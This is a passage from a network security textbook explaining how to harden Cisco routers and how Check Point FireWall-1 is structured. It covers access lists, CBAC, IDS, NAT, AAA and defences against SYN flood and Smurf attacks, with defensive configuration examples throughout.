Lines 16 and 17 specify that only a single host can gain remote access to the router. This helps to strengthen the device's protection even further. Remember that when you use telnet to manage the router (without enabling any router-to-router encryption), all information (including passwords) is sent in clear text. These filters help to insure that even if someone does compromise the passwords, they are only useful from a single remote system (unless, of course, the attacker fakes his IP address, but we will not go there).

Finally, the access rules end by stating, "Let out any traffic we have not explicitly denied." If there are TCP services you wish to filter, you could enter these test conditions prior to this last rule.

Tip: Do not save your changes right away. Perform your testing with the changes in active memory only. If you have inadvertently locked yourself out of the device, you can simply power cycle it to return to the last saved configuration. Just remember to save the new configuration once you know the changes are acceptable!

Dynamic Access Lists

Exceptions can arise for any security policy, and dynamic access lists are a reflection of that necessity. Also called lock-and-key, this feature creates dynamic extended access lists; however, it can also be used with standard and static extended access lists.

When activated, lock-and-key changes the existing access list for a given interface to allow a designated user to access a given resource. Lock-and-key then alters the access list again, reverting it to its previous state.

Lock-and-key provides benefits beyond those of traditional standard and static extended access lists:

• Users are authenticated through a challenge mechanism.
• In larger networks, lock-and-key provides a simplified method for management.
• Router processing of access lists is decreased.
• Fewer exploitable openings occur in the router infrastructure.

Here is an example of how lock-and-key works:

1. Let's say a vacationing administrator must remotely connect to the network to perform troubleshooting. The administrator opens a telnet session to the router.
2. The router performs a user authentication process (either by itself or through a separate security system like TACACS+ or RADIUS).
3. Upon successful authentication, the administrator is logged out of the telnet session, and the router makes a temporary entry in the dynamic access list.
4. The administrator now has access into the internal network and makes the required changes.
5. Once finished, the administrator initiates a new telnet session and manually clears the temporary entry. The administrator could also have specified an idle or absolute timeout value for the entry, in which case the router would have automatically cleared the entry after it expired.
For example, consider the following code, which shows the command used to configure a dynamic access list:

access-list {access-list-number} dynamic {dynamic-name} {deny or permit} telnet {source} {source-wildcard} {destination} {destination-wildcard} precedence {precedence} tos {tos} established log

In practice, even if administrative policy is to manually clear the entry, a timeout value is an easily configured reassurance that a potential security hole is closed.

Spoofing

The temporary entry in the dynamic access list created by lock-and-key is an opening that makes the router susceptible to spoofing. One method of countering this threat is to enable encryption on the router and on the remote router servicing the remote host (in our example, the router acting as the administrator's immediate gateway). With an encrypted connection, the host IP address is hidden within the encrypted traffic from any potential hackers, and therefore can't be spoofed.

Reflexive Access Lists

As of IOS 11.3, Cisco routers support reflexive access lists. Reflexive access lists are made to be a replacement for the static est (established) keyword. When reflexive access lists are used, the router creates a dynamic state table of all active sessions.

The ability to generate a state table pushes the Cisco router into the realm of a true firewall. By monitoring state, the router is in a far better position to make filter determinations than equivalent devices that only support static filtering.

In order to use reflexive access lists, you must use access list names, not range identifier numbers. This is not a big deal, as using a name allows you to be far more descriptive in labeling your access lists.

The syntax for creating a reflexive access list is

permit {protocol} {source} {mask} {destination} {mask} reflect {name}

So you could create a reflexive access list using the following parameters:

permit ip any any reflect ipfilter

Let's assume that you only wish to allow in SMTP to a single internal host, as well as any replies to active sessions that were established by any system on your internal network. In this situation, you could create the following in global configuration mode:

ip access-list extended inboundfilters
permit tcp any 206.121.73.21 0.0.0.0 eq 25
evaluate tcptraffic

This would allow inbound replies to active sessions and inbound SMTP sessions to be established.

The only caveat with reflexive access lists is that entries are purged from the state table after 300 seconds of inactivity. While this is not a problem for most protocols, the FTP control session (port 21) can sit idle for a far longer period of time during a file transfer. You can increase this timeout value using the following command:

ip reflexive-list timeout {timeout in seconds}
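Keep in mind that the evaluate statement above refers to a reflexive list that must first be defined with the reflect keyword on the matching outbound filter. A minimal sketch of such a matched pair (the list and filter names are placeholders), applied to the WAN interface, might look like this:

! Outbound: record every TCP session initiated internally
ip access-list extended outboundfilters
permit tcp any any reflect tcptraffic
! Inbound: allow SMTP to the mail server plus replies
! to the sessions recorded above
ip access-list extended inboundfilters
permit tcp any 206.121.73.21 0.0.0.0 eq 25
evaluate tcptraffic
!
interface serial 0
ip access-group outboundfilters out
ip access-group inboundfilters in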
TCP Intercept

DoS (denial-of-service) attacks have become quite prevalent recently. The most popular way to implement this attack is using the SYN flood. A hacker creates a SYN flood by initiating a large quantity of connection requests in a short amount of time. Because the connection requests don't come from valid addresses, the server can't complete the connections. The result is that the server is so tied up in attempting to respond to invalid requests that it has no resources left to answer legitimate requests for services (such as Web, FTP, and e-mail).

Cisco's TCP intercept component resolves this problem by answering all incoming connection requests itself. If successful, it opens a connection with the server and links the two connections together. If the connection request is not legitimate, the request is dropped and a threshold counter is incremented. Once the limit on this counter is reached, all additional connection requests from that particular address are automatically dropped.

Activating TCP Intercept

Before TCP intercept can be enabled, an extended access list has to be created to identify the destinations you wish to protect:

access-list {access-list-number} {deny or permit} tcp any {destination} {destination-wildcard}

Following this, enter the command to activate TCP intercept:

ip tcp intercept list {access-list-number}

TCP intercept can operate in two modes: intercept or passive watch. In default intercept mode, TCP intercept intercedes and responds to every incoming SYN with a SYN-ACK. Only after receiving an ACK from the remote host does the router pass along the original SYN request to the server, completing a three-way TCP handshake. Finally, the router joins both connections together.

If TCP intercept is configured in passive watch mode, the router does not intercept communications unless a connection request goes unanswered after a period of time (the default is 30 seconds). The mode is configured with the following command:

ip tcp intercept mode {intercept or watch}
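As a brief sketch (the list number is hypothetical, and the protected subnet follows the addressing used in earlier examples), you could intercept connection requests bound for an internal server segment like this:

access-list 120 permit tcp any 206.121.73.0 0.0.0.255
ip tcp intercept list 120
ip tcp intercept mode intercept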
Context-Based Access Control

Context-Based Access Control (CBAC) uses information at the application layer of the OSI model to filter TCP and UDP network traffic, analyzing and permitting traffic passing through both sides of a router. Because of its ability to look at application data, CBAC allows filtering for protocols that open up multiple channels (such as RPC, FTP, and most multimedia protocols), as well as Java applets (providing they are not compressed or archived).

Because CBAC opens connections dynamically (limiting data to those sessions that were initiated from within a firewall), it provides a defense against DoS attacks. CBAC also verifies that TCP sequence numbers are within expected ranges, and will also watch and respond to abnormally elevated rates of connection requests.

Application-based logging and alerts are another benefit of CBAC. By tracking time stamps, source and destination addresses, ports, and data transferred, CBAC gives centralized reporting and management systems enough information to match network patterns against hacking "signatures," allowing the system to automate some of its defense against known penetration and DoS methods.

While CBAC can evaluate any generic TCP or UDP session, it can also analyze the following popular application protocols:
• FTP
• TFTP
• H.323 (protocol used by Microsoft NetMeeting)
• HTTP (including Java applets)
• Microsoft NetShow
• rexec, rsh, rlogin
• RealMedia
• RTSP (Real Time Streaming Protocol)
• SMTP

CBAC Example

Let's use a sample FTP session to walk through the CBAC process in detail:
1. The external interface of a router receives a packet originating on the internal (secure) side of the network.
2. The router uses the outbound access list defined on the external interface to determine if the packet is allowed. Non-allowed packets are automatically denied.
3. If the packet is allowed, CBAC creates a new connection state table entry and stores the packet's information in it.
4. CBAC then temporarily modifies the incoming access list on the external interface to allow the returning session data into the internal network (packets that match the same state data that was taken from the outgoing packet and stored in the connection state table). Only after the access list is modified does CBAC forward the outgoing packet from the external interface.
5. As data returns to the external interface, all packets are compared to the incoming access control list. If the valid connection data matches the temporary changes made by CBAC to the access control list, those packets are forwarded into the internal network, completing the connection.
6. When a connection terminates (or if it times out), CBAC removes the connection state table entry and the temporary changes to the access control list, returning the router to its previous state.

Configuring CBAC

There are several steps to configuring CBAC:
1. Select the interface. For networks with a DMZ (Demilitarized Zone), the evaluation will take place on the internal interface. For simple networks, packets are screened on the external interface.
2. Implement an IP access list. After creating a basic access list, all CBAC-evaluated traffic is permitted out, but all incoming CBAC traffic is denied. (CBAC will make its own dynamic and temporary exceptions to these rules.)
3. Set timeouts and thresholds. These settings determine how long connection state tables are maintained and how long to wait before incomplete connections are terminated, which provides a defense against DoS attacks. To activate this last feature, enter the following at the console:
ip inspect tcp synwait-time {seconds}
4. Create an inspection rule. This determines what application layer protocols will be evaluated at the interface. Options include alerting, auditing, and whether the rule checks for IP fragmentation. This example establishes an FTP inspection rule:
ip inspect name ftprule ftp alert on audit-trail on timeout 30
5. Apply the inspection rule. The rule is applied to outbound traffic if it is set at the external interface, and to inbound traffic if it is set at the internal interface. Continuing our example,
ip inspect ftprule out
6. Establish logging. This helps determine unauthorized access attempts as well as creating a record of legitimate traffic and services. Global auditing would be enabled like this:
ip inspect audit-trail
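Pulled together for a simple network with no DMZ, the steps above might produce a sketch like the following; the interface name, list number, and timer values are hypothetical:

ip inspect tcp synwait-time 15
ip inspect name ftprule ftp alert on audit-trail on timeout 30
ip inspect audit-trail
!
! deny all inbound traffic by default; CBAC adds temporary
! entries to this list for legitimate return traffic
access-list 111 deny ip any any log
!
interface serial 0
 ip access-group 111 in
 ip inspect ftprule out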
Firewall Intrusion Detection System

Cisco's Intrusion Detection System (IDS) uses 59 attack signatures to recognize and react to hacking attempts. IDS is designed to recognize, record, and react to an attack before a breach can occur. IDS signatures are broken into two categories: info and attack. An info signature looks for attempts to collect information about the network (like a port scan). The attack signature looks for actual breach attempts. Each of these two categories is further subdivided into atomic and compound signatures. Atomic signatures look for tiny details, such as a request for a specific port. Compound signatures look for overall patterns.

IDS Process

The IDS system works as follows:

Audit rule is created. Any number of signatures (from one to all) can be associated with a rule.

Audit rule is applied. When the rule is applied to incoming traffic, IDS has an opportunity to evaluate packets before the ACL does, thereby providing attack details that would normally be lost by ACL denial. If the rule is applied to outgoing traffic on an interface, IDS analyzes that data only after it has entered the router from another port.

Packets are audited. Various modules analyze the packet, starting with IP, then moving on to either ICMP, TCP, or UDP, and ending with the application layer.

Signature is matched. If a packet matches a signature at any of these modules, then the appropriate action takes over:
• Alarm: sends an alarm to a central monitoring system.
• Drop: the packet is not forwarded.
• Reset: a packet with its reset flag set is sent to each party in the connection.

Configuring IDS

The steps to configure IDS include:
• Activate IDS
• Activate the Post Office
• Create and activate audit rules

Activating IDS  Activating IDS requires two commands to be issued at the console in global configuration mode. The first establishes auditing:

ip audit {protocol} {signature} {options}

The second command establishes a limit to how many stored events matching a particular signature are sent to the IDS Director (the centralized alert monitoring system for IDS):

ip audit po max-events {quantity of events}

Activating the Post Office  The Post Office is a proprietary Cisco protocol that creates point-to-point connections between the IDS central management system and IDS hosts (routers configured with IDS features). Alarms are transferred along the Post Office to either a log or the IDS Director.

ip audit notify nr-director/log

All hosts are assigned a number between 1 and 65535 (the host-id). The Director, along with all participating IDS routers, is assigned a common organization number, also between 1 and 65535 (the org-id).
ip audit po local hostid {host-id} orgid {org-id}

Post Office parameters for the Director also have to be set, including the following:

rmtaddress: the IP address of the Director

localaddress: the IP address of the host interface

port: 45000 by default, this is the port number through which the Director expects to hear alarms

preference: if more than one route is configured to the Director, this number (either 1 or 2) determines the priority for this particular connection

timeout: how long until the Post Office determines a connection has timed out (in seconds)

application: what type of system is handling the events (log or Director)

ip audit po remote hostid {host-id} orgid {org-id} rmtaddress {ipaddress} localaddress {ipaddress} port {port-number} preference {number} timeout {seconds} application {type}

Creating and Activating Audit Rules  The first two commands determine what default actions are taken when packets match an info signature or an attack signature (alarm, drop, or reset):

ip audit info alarm/drop/reset
ip audit attack alarm/drop/reset

Once default actions are specified, a user-supplied audit-name (which can be used later to assign signatures to the rule) is assigned to a particular rule along with a signature type (info or attack), standard ACL, and action (alarm, drop, reset):

ip audit name {audit-name} info/attack list {standard ACL} action alarm/drop/reset

Once defined, a rule is then applied to an interface along with a direction (in or out). This command is issued in interface mode:

ip audit {audit-name} in/out

Finally, the IP address of the network to be protected is configured (in global configuration mode):

ip audit po protected {ip address}
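As a sketch tying these commands together (all IDs, names, and addresses are hypothetical, and the command forms simply follow the templates above):

ip audit notify nr-director
ip audit po local hostid 10 orgid 100
ip audit po remote hostid 1 orgid 100 rmtaddress 10.1.1.50 localaddress 10.1.1.1 port 45000 preference 1 timeout 5 application director
ip audit info alarm
ip audit attack alarm
ip audit name audit1 attack action alarm
!
interface ethernet 0
 ip audit audit1 in
!
ip audit po protected 10.1.1.0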
Authentication Proxy

Cisco's authentication proxy associates security policies with user profiles, allowing control over how individuals access network resources. User profiles come from a RADIUS or TACACS+ server, but only when the user is actively engaging in data transfers. Cisco has integrated the authentication proxy with other security services like NAT, CBAC, VPN, and IPSec, which provides a consistent integration of all access control policies.

The authentication proxy works by intercepting a user's HTTP requests. If the user has already been authenticated, the proxy forwards that packet (and any subsequent packets from the same connection). If the authentication proxy determines that the user hasn't been authorized, the router's HTTP server prompts the user for a username and password. If the user doesn't provide correct information after five attempts, the proxy ceases to respond (denying even a login prompt) for two minutes.

When the authentication proxy determines that the user has provided a valid username and password, it obtains the user profile from the AAA server. Based on this profile, the authentication proxy makes a dynamic entry in the ACL of both the inbound and outbound interfaces required to complete the connection. If the user continues to use the connection within the timeout limit, she is not prompted to re-enter her credentials. The authentication proxy removes the dynamic ACL changes after the end of the timeout period.

Configuring the Authentication Proxy

There are three required steps to configure the authentication proxy:
• Configure AAA
• Configure the HTTP server
• Configure the authentication proxy

Configuring AAA  The following command enables the router for AAA:

aaa new-model

The next two commands define which authentication service is to be offered to the user by default at login (RADIUS or TACACS+), and then allow those services:

aaa authentication login default RADIUS/TACACS+
aaa authorization auth-proxy default {1st method} {2nd method}…

To specify the RADIUS or TACACS+ server, use

radius/tacacs-server host {hostname}

To specify the service key used for encryption and authentication between the router and the server, use

radius/tacacs-server key {key}

Finally, an ACL permits traffic back from the authentication server:

access-list {number of access list} permit tcp host {source} eq {tacacs} host {destination}

Configuring the HTTP Server  These commands are entered in global configuration mode. The first enables the HTTP server on the router:

ip http server

The second command sets AAA as the authentication mode:

ip http authentication aaa

The third and final command specifies which access list is bound to the HTTP server:

ip http access-class {number of access list}

Configuring the Authentication Proxy  Finally, the authentication proxy is itself configured. The first command sets the timeout, after which the authentication proxy removes the dynamic changes to the ACL (along with user authentication entries):

ip auth-proxy auth-cache-time {minutes}

The next command actually creates the authentication proxy rule and associates it with the HTTP protocol:

ip auth-proxy name {rule name} http

The final command is issued in interface mode, and activates the rule by associating it with an interface:

ip auth-proxy {rule name}
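A condensed sketch using RADIUS might look like the following; the server address, key, rule name, timeout, and interface are all hypothetical, and the group keyword syntax assumes a reasonably recent IOS release:

aaa new-model
aaa authentication login default group radius
aaa authorization auth-proxy default group radius
radius-server host 10.1.1.40
radius-server key s3cr3tkey
!
ip http server
ip http authentication aaa
!
ip auth-proxy auth-cache-time 60
ip auth-proxy name webauth http
!
interface ethernet 0
 ip auth-proxy webauth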
Application Mapping

Cisco uses port-to-application mapping (PAM) to allow organizations to create CBAC-enforced filtering policies around non-standard (non-registered) TCP and UDP ports. The PAM feature does this by creating a table map associating applications with specific ports. Using standard ACLs, PAM can also be applied to an entire subnet, or a single host. There are three different types of entries in the PAM table:

System-defined  These entries cannot be edited or deleted, and consist of the registered (or well-known) port-to-application mappings (such as TCP 21=FTP).

User-defined  Custom entries of port-to-application mappings, with the limitation that applications can't be mapped to well-known ports (i.e., HTTP can't be mapped to TCP 21, which is already assigned to FTP by a system-defined entry).

Host-defined  This option allows mappings to be created specifically for an IP host or subnet. This creates additional security by, for example, only allowing HTTP traffic destined for a custom (and therefore hidden) port on a Web server if it originates from an internal subnet. Host-defined entries are also the only way to override system-defined mappings.

Configuring PAM

PAM is enabled on a router by specifying the application name and the port number, along with the option of associating PAM with a standard ACL (in order to apply a mapping to a subnet or host):

ip port-map {application name} port {port number} list {ACL number}

Delete a mapping by using a variant of the previous command:

no ip port-map {application name} port {port number} list {ACL number}

Overriding a standard port-to-application mapping requires two commands, the first to create a standard ACL that is applied to a specific host, the second to create the port mapping override:

access-list {ACL number} permit {IP address of host}
ip port-map {application name} port {port number} list {ACL from access-list command}

Network Address Translation

Originally conceived as a technique to preserve IP addresses, Network Address Translation (NAT) provides an additional layer of network security by hiding your network IP addresses from the Internet. NAT allows organizations to use private IP address ranges (private because no public router will recognize or route packets with a source or destination address that belongs to a private range), yet still have connectivity with the Internet.

Cisco uses the following terms to make understanding NAT concepts and configuration clearer:

Inside local address  The private IP address assigned to a host on the internal network.

Inside global address  The public IP address that is assigned to outgoing data originating from an inside local address (assigned to a host on the private network) as it crosses the NAT router. This address is unique on the public Internet, hence global.

Outside global address  The host IP address as assigned by the owner of the host (and a valid public Internet address).

Outside local address  The IP address of a host on the outside network as it appears to the inside network. Because NAT can work both ways, the outside global address of a host can also be hidden from the internal private network.

A router performing NAT works on the border between the private network of an organization and the public Internet. When a host on the internal network requests a connection to a host with an outside global address (such as a public Web server), it sends the packet to a NAT router. NAT changes the source IP address (the host's inside local address) on the packet to an inside global address (a public address assigned to the NAT interface connected to the Internet), and then forwards the packet to the Internet host. As the Internet host returns the packet, it sets its own outside global address as the source address and the NAT-assigned inside global address as the destination address. When the packet reaches NAT, NAT replaces the destination inside global address with the inside local address of the host that originated the session, and forwards the packet to the internal host. NAT repeats this process for the duration of the session.

Static Address Translation

NAT can perform both static and dynamic address translation. Static translation associates a single inside local address with a single inside global address (which is not shared with any other sessions originating from the internal network). Static translation allows an outside global address to initiate a communication session with a host on the internal network, while keeping the assigned inside local address secret.
For example, you would use static address translation if you had a Web server located on the internal network that still needed to be able to receive HTTP sessions originating from an outside global address.

The first step to configuring static address translation is associating an inside local address with an inside global address:

ip nat inside source static {inside local address} {inside global address}

The final four commands define the private and public interfaces as being either inside or outside in relation to NAT:

interface {type} {number}
ip nat inside
interface {type} {number}
ip nat outside

Dynamic Address Translation

Dynamic address translation associates an inside local address with an inside global address chosen from a pool of addresses. This is the most common configuration for hosts on the internal network that act as clients for Internet services. It is also the least taxing administratively.

The first command to enable dynamic address translation creates a range of IP addresses (the address pool):

ip nat pool {name of pool} {starting IP address} {ending IP address} netmask {subnet mask}

Then an ACL is created that defines which inside local addresses are allowed to be translated:

access-list {access list number} permit {source}

Dynamic address translation is enabled while specifying the access list created in the previous command:

ip nat inside source list {access list number} pool {name of pool}

The final four commands define the private and public interfaces as being either inside or outside in relation to NAT:

interface {type} {number}
ip nat inside
interface {type} {number}
ip nat outside
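As a sketch of a dynamic translation for an internal 192.168.1.0 network (the pool name, public addresses, and interface names are hypothetical):

ip nat pool mypool 206.121.73.10 206.121.73.20 netmask 255.255.255.0
access-list 7 permit 192.168.1.0 0.0.0.255
ip nat inside source list 7 pool mypool
!
interface ethernet 0
 ip nat inside
interface serial 0
 ip nat outside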
User Authentication and Authorization

Cisco routers use user-based authentication and authorization for access to network resources (including access to the router itself). Authentication is the process that verifies the identity of the user. Authorization generally follows immediately after authentication and ensures that a user actually has the permissions necessary to access a resource. In both instances, separate security services are commonly used (RADIUS, Kerberos, and, less commonly, TACACS and TACACS+). There are three steps to enable authentication and authorization services on a router:
• Activate AAA
• Activate authentication
• Activate authorization

Activating AAA

Activating AAA on a router is quite simple. Keep in mind, however, that the original TACACS and XTACACS are older protocols that are not compatible with AAA; TACACS+, like RADIUS and Kerberos, was designed with AAA in mind. Enter the following command in global configuration mode:

aaa new-model

Deactivating AAA is just as easy as activating it:

no aaa new-model

Activating Authentication

Authentication (like authorization) relies on a method list. A method list contains one or more ways a user can be authenticated (or authorized) on a router. In case one of the services is unavailable (perhaps your RADIUS server goes down), the router can use a backup method (another RADIUS server or a locally-stored user database) to authenticate the user. Instead of defining individual authentication services, the method list is defined on groups. A single group can have more than one instance of the same type of service (i.e., one or more RADIUS services in the RADIUS group).

The first command defines the group name; each member server is then added with the server subcommand:

aaa group server radius {group name}
server {ip address}

The next command defines a method list titled "default" and applies the list to all router logins. All users will be authenticated by the RADIUS group unless all servers within that group are unreachable, in which case the router will look to the local user database:

aaa authentication login default group radius local

Activating Authorization

Method lists are also used to define where the system finds and retrieves the system profiles that define user access. Configured in a manner similar to authentication method lists, authorization method lists also define which network services are controlled by the various methods. These network services are combined into five categories:

Auth-proxy  part of the Authentication Proxy system, used to associate policies on a per-user basis

Commands  defines access on specific commands given in the EXEC mode on the router

EXEC  specifies characteristics of the router terminal session in general

Network  all network sessions including PPP

Reverse Access  pertains to reverse telnet sessions

The first command creates a method list:

aaa authorization auth-proxy/network/exec/commands {level}/reverse-access {list name} {method}

The second command (performed in interface mode) links the authorization method list with an interface:

login authorization {list name}
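As a brief sketch (the server addresses, group name, and backup account are hypothetical), a router could authenticate logins against two RADIUS servers with fallback to the local user database:

aaa new-model
aaa group server radius radgroup
 server 10.1.1.30
 server 10.1.1.31
aaa authentication login default group radgroup local
! local account used only if both RADIUS servers are unreachable
username backupadmin password s3cr3t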
Additional Security Precautions

Along with all the security precautions we have looked at so far, there is one more worth adding to the list. Our final task is to help prevent Smurf attacks. Named after the original program that would launch this attack, Smurf uses a combination of IP spoofing and ICMP replies in order to saturate a host with traffic, causing a denial of service.

The attack goes like this: Woolly Attacker sends a spoofed ping packet (echo request) to the broadcast address of a network with a large number of hosts and a high-bandwidth Internet connection. This is known as the bounce site. The spoofed ping packet has a source address of the system Woolly wishes to attack.

The premise of the attack is that when a router receives a packet sent to an IP broadcast address (such as 206.121.73.255), it recognizes this as a network broadcast and will map the address to an Ethernet broadcast address of FF:FF:FF:FF:FF:FF. So when your router receives this packet from the Internet, it will broadcast it to all hosts on the local segment.

I'm sure you can see what happens next. All the hosts on that segment respond with an echo reply to the spoofed IP address. If this is a large Ethernet segment, there may be 500 or more hosts responding to each echo request they receive.

Since most systems try to handle ICMP traffic as quickly as possible, the target system whose address Woolly Attacker spoofed quickly becomes saturated with echo replies. This can easily prevent the system from being able to handle any other traffic, thus causing a denial of service.

This not only affects the target system, but your organization's Internet link, as well. If the bounce site has a T3 link (45Mbps) but the target system's organization is hooked up to a leased line (56Kbps), all communication to and from your organization will grind to a halt.

So how can you prevent this type of attack? You can take steps at the source site, bounce site, and target site to help limit the effects of a Smurf attack.

Blocking Smurf at the Source

Smurf relies on the attacker's ability to transmit an echo request with a spoofed source address. You can stop this attack at its source by using the standard access list described earlier in this chapter. This will insure that all traffic originating from your network does in fact have a proper source address, stopping the attack at its source.

Blocking Smurf at the Bounce Site

In order to block Smurf at the bounce site, you have two options. The first is to simply block all inbound echo requests (a minimal filter sketch appears at the end of this section). This will prevent these packets from ever reaching your network.

If blocking all inbound echo requests is not an option, then you need to stop your routers from mapping traffic destined for the network broadcast address to the LAN broadcast address. By preventing this mapping, your systems will no longer receive these echo requests.

To prevent a Cisco router from mapping network broadcasts to LAN broadcasts, enter configuration mode for the LAN interface and enter the command

no ip directed-broadcast

Warning  This must be performed on every LAN interface on every router. This command will not be effective if it is performed only on your perimeter router.

Blocking Smurf at the Target Site

Unless your ISP is willing to help you out, there is little you can do to prevent the effects of Smurf on your WAN link. While you can block this traffic at the network perimeter, this is too late to prevent the attack from eating up all of your WAN bandwidth.

You can, however, minimize the effects of Smurf by at least blocking it at the perimeter. By using reflexive access lists or some other firewalling device that can maintain state, you can prevent these packets from entering. Since your state table would be aware that the attack session did not originate on the local network (it would not have a table entry showing the original echo request), this attack would be handled like any other spoof attack and promptly dropped.
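As a minimal sketch of the bounce-site filters (the list number and interface names are hypothetical):

! drop inbound echo requests at the perimeter
access-list 112 deny icmp any any echo
access-list 112 permit ip any any
!
interface serial 0
 ip access-group 112 in
!
! and on every LAN interface, prevent broadcast mapping
interface ethernet 0
 no ip directed-broadcast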
Chapter 7: Check Point's FireWall-1

Choosing which firewall to cover in this chapter was difficult. There are many firewall products on the market, with a wide range of features. I chose FireWall-1 because it is by far the most popular firewall on the market today. It has enjoyed a larger deployment than any other firewall solution, barring the Cisco router that we covered in Chapter 6.
FireWall-1 Overview

FireWall-1 supports a wide range of features, but uses three primary components to create and enforce security policies:
• GUI management interface
• Management Server
• FireWall Module

GUI Management Interface

A GUI client is used to define a network (or enterprise) Security Policy (along with Address Translation and Bandwidth policies), which in turn is defined by using network objects (hosts, gateways, etc.) and security rules. The GUI includes the Log Viewer and System Status Viewer.

FireWall-1 creates an INSPECT script from the policies (Security, Address Translation, and/or Bandwidth) that are defined at the GUI. INSPECT is an object-oriented, high-level scripting language that is proprietary to Check Point. The INSPECT script is then compiled to create the Inspection Code, which is then loaded into the various Inspection Modules (discussed later in this chapter) on the network. Because the original INSPECT scripts are text files, they can be customized by security administrators to meet specific needs.

Management Server

Although the various policies are created using the GUI client, they are actually stored on the Management Server. The Management Server is responsible for storing and maintaining all FireWall-1 databases (including those for network object and user definitions), policies, and log files for all network enforcement points.

FireWall Module

A FireWall Module is a software component that is installed on any network enforcement point (usually a gateway). FireWall Modules receive the policies from the Management Server and implement them, thereby securing the network.

Inspection Module

The Inspection Module is loaded in the OS, below the network layer (below in reference to the OSI model) but above the data-link layer. Packets are analyzed by the Inspection Module and compared to the policies.

IP addresses, port numbers, and state information from previous communications are all analyzed by the Inspection Module to determine if the policies will permit the packets. All state and context information for all sessions is stored in dynamic connection tables. Continually updated, these tables provide the Inspection Module with cumulative data against which it checks follow-on communications.

Security Servers

Security Servers are responsible for user authentication and content security. Authentication can work with FTP, HTTP, Rlogin, and telnet. Some of the authentication schemes (or vendor technologies) that can be used with FireWall-1 include:
• FireWall-1 Password
• OS Password
• S/Key
• SecurID Tokens
• RADIUS
• Axent Pathways Defender
• TACACS/TACACS+
• Digital Certificates

There are three different authentication methods that can be used with the above schemes:

User Authentication  Conducted transparently (the user does not connect explicitly to the FireWall-1 gateway), User Authentication allows access from any IP address.

Client Authentication  Available for any service, Client Authentication is associated with a particular IP address, and may or may not be transparent.

Session Authentication  User connection requests are intercepted by FireWall-1, which then activates the Session Authentication Agent (installed on the client). Upon successful receipt of credentials, FireWall-1 completes the connection request.
\n" }, { "page_number": 145, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 145\nSecurity Servers are also responsible for Content Security, which is available for the following protocols: \nHTTP controls content based on schemes (HTTP, FTP, etc), methods (GET and POST), hosts \n(*.com), paths, and queries. \nFTP controls content based on anti-virus checks on the files, as well as file name restrictions, and \nFTP commands (GET and PUT). \nSMTP controls content based on address fields (“From” and “To”), as well as header and \nattachment types (*.VBS). Address translation is also available, hiding real user names from the \noutside world while still preserving the ability to restore correct address in a response. \nSecurity and Management Services \nIn addition to authentication and content filtering, FireWall-1 provides the following security and management \nservices: \nƒ NAT (Network Address Translation) \nƒ VPN (Virtual Private Networks) \nƒ LDAP (Lightweight Directory Access Protocol) Account Management \nƒ Third-party device management (Open Security Extension) \nƒ Fault-tolerance (High Availability) \nƒ Load balancing (ConnectControl) \nNetwork Address Translation (NAT) \nNAT maps private IP addresses to one or more public IP addresses. FireWall-1 provides both dynamic and static \naddress mapping through two methods: \nGraphical Address Translation Rule Base An Address Translation Rule Base can be used to \nspecify objects by name rather than by IP address (the objects having been assigned an IP address \npreviously). Rules can then be applied to specific destination and source IP addresses or services. \nAutomatic Configuration With Automatic Configuration, translation properties are assigned to \nnetwork objects (such as networks or workstations), and then rules are automatically generated for \nthese properties. \nVirtual Private Networks (VPN) \nCheck Point’s VPN-1 Gateway is a combination of FireWall-1 and an optional VPN module. VPN-1 provides site-\nto-site and remote user VPN access while supporting industry standard protocols: \nƒ \nDES \nƒ \nTriple DES \nƒ \nIPSec/IKE \nƒ \nDigital certificates \nFor more on VPN, see Chapter 10, “Virtual Private Networking.” \n" }, { "page_number": 146, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 146\nLightweight Directory Access Protocol (LDAP) \nFireWall-1 uses an Account Management module to pull user data from any LDAP-compliant server. As a result, \nLDAP users (and even servers) can be used by rules like any other network object. A simple example would be a \nuser outside the firewall requesting access to resources behind the gateway. Because the FireWall Module can \nquery the LDAP database stored on a third-party LDAP-compliant server to verify the credentials offered by a \nuser, the importation of large user databases is not needed. \nThe Account Management Client can be launched from the FireWall-1 GUI or as a stand-alone application. \nTemplates can be used to apply configuration properties to multiple users at once. Any change in a template is \nautomatically made to all users who are associated with the template. Because all the components involved \n(FireWall-1, Account Management Client, and LDAP servers) use SSL, the communication is secure. 
Third-Party Device Management

The Open Security Extension is an optional component that takes a network-wide policy and applies it to third-party security devices from vendors like 3Com, Microsoft, Cisco, and Nortel. Once a Security Policy is defined, FireWall-1 creates an ACL (Access Control List) and sends it to each router and device in the network.

The Open Security Extension also has the ability to import pre-existing Access Lists as Security Policy objects, along with log messages, allowing for centralized management of policies in conjunction with logging and reporting.

Fault Tolerance

Because all FireWall Modules on a network share connection and state information, each individual FireWall Module has a complete awareness of all network communications. If a FireWall Module fails, another FireWall Module takes control and maintains the connection in its place.

Because the state tables of each connection are continually synchronized between FireWall Modules, the system can support asymmetric routing. Without this information, packets that are part of the same session but travel through different routes and different gateways might be interpreted differently, and some might be dropped.

Load Balancing

ConnectControl is an optional module that creates a Logical Server object (multiple physical servers providing the same service). Rules can be defined that direct all connections of a particular server to a given Logical Server. Clients are only aware of one Logical Server, although in reality they are connected to any of the physical servers making up the Logical Server. There are five load-balancing algorithms:

Server load  Only available when a server has a load-measuring agent installed, FireWall-1 uses the information from the various agents to determine which server is best able to handle the incoming connection.

Round trip  PING data determines which server has the shortest round-trip time and therefore should handle a connection.

Round robin  The next server in the list is assigned the connection.

Random  A server is selected based on a random algorithm.

Domain  The closest server as determined by domain names is chosen.

Finding Good FireWall-1 Support

The best technical information on FireWall-1 outside of Check Point comes from Phoneboy, specifically www.phoneboy.com. In addition to one of the best FAQ sites on the product, the site hosts a moderated list dedicated to FireWall-1 at www.phoneboy.com/fw1/wizards/index.html.

Of course, you can still subscribe to the official Check Point FireWall-1 mailing list by sending a message to the list's subscription address with the words

subscribe fw-1-mailinglist

in the body of the message. Although this list is operated by Check Point, it is truly an unmoderated list. Subscribers discuss problems and complaints quite openly, and only rarely do you see someone from Check Point posting to the list. This means that you receive advice and help from neighborly people within the end-user community. This is always a good thing: you are far more likely to receive straight advice, not marketing hype.

Choosing a Platform

One of FireWall-1's strengths is the diversity of platforms it supports. FireWall-1 components work with various operating systems as illustrated in Table 7.1.
Table 7.1: Operating systems supported by FireWall-1

FireWall-1 Modules                          Operating Systems
Management Server and Enforcement Module    Microsoft Windows NT 4.0 (SP4–SP6a)
                                            Sun Solaris 2.6, Solaris 7 (32-bit mode only)
                                            Red Hat Linux 6.1 (with kernel 2.2.x)
